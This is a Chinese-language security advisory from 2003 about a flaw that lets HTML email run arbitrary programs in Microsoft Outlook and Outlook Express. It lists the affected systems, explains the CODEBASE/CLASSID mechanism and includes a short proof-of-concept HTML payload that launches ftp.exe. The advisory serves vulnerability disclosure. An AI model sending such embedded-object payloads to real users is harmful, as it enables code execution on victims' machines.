首页 -> 安全研究

安全研究

安全漏洞
Microsoft Outlook和Outlook Express远程任意程序执行漏洞

发布日期:2003-02-24
更新日期:2003-03-03

受影响系统:
Microsoft Outlook 2000 SR1
Microsoft Outlook 2000 SP2
Microsoft Outlook Express 6.0
Microsoft Outlook 2000
    - Microsoft Windows NT 4.0 SP6a
    - Microsoft Windows NT 4.0 SP6
    - Microsoft Windows NT 4.0 SP5
    - Microsoft Windows NT 4.0 SP4
    - Microsoft Windows NT 4.0 SP3
    - Microsoft Windows NT 4.0 SP2
    - Microsoft Windows NT 4.0 SP1
    - Microsoft Windows NT 4.0
    - Microsoft Windows ME
    - Microsoft Windows 98 SE
    - Microsoft Windows 98
    - Microsoft Windows 95
    - Microsoft Windows 2000 Server SP2
    - Microsoft Windows 2000 Server SP1
    - Microsoft Windows 2000 Server
    - Microsoft Windows 2000 Professional SP2
    - Microsoft Windows 2000 Professional SP1
    - Microsoft Windows 2000 Professional
    - Microsoft Windows 2000 Datacenter Server SP2
    - Microsoft Windows 2000 Datacenter Server SP1
    - Microsoft Windows 2000 Datacenter Server
    - Microsoft Windows 2000 Advanced Server SP2
    - Microsoft Windows 2000 Advanced Server SP1
    - Microsoft Windows 2000 Advanced Server
不受影响系统:
Microsoft Outlook 2000 SP3
描述:
BUGTRAQ  ID: 6923

Microsoft Outlook和Outlook Express是流行的邮件客户端。

Microsoft Outlook和Outlook Express在处理HTML形式邮件时存在问题,远程攻击者可以利用这个漏洞通过发送嵌入对象的HTML邮件使目标用户的Outlook执行任意命令。

当一个邮件消息或新闻组消息通过Outlook查看的时候,会在Internet Explore缓冲区中建立临时对象,而这个缓冲区的安全区域由IE来设置,并且默认设置为Internet区域。攻击者可以把对象嵌入到HTML消息中通过使用CODEBAS引用和非零CLASSID值来引用一个可执行文件。攻击者也可以通过把文件放置在临时文件夹中并通过这个方法来执行。

<*来源:http-equiv (http-equiv@malware.com
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=104610205124193&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

http-equiv (http-equiv@malware.com)提供了如下测试方法:

把如下对象嵌入到HTML形式邮件中,并发给目标用户,可导致ftp.exe执行:

<xml id=oExec> <security><exploit> <![CDATA[ <object id="oFile"
classid="clsid:11111111-1111-1111-1111"
code base="C:\WINDOWS\FTP.EXE"></object>]]></exploit></security></xml>
<SPAN dataFld=exploit dataFormatAs=html
dataSrc=#oExec></SPAN>

建议:
厂商补丁:

Microsoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.microsoft.com/technet/security/

浏览次数:3502
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障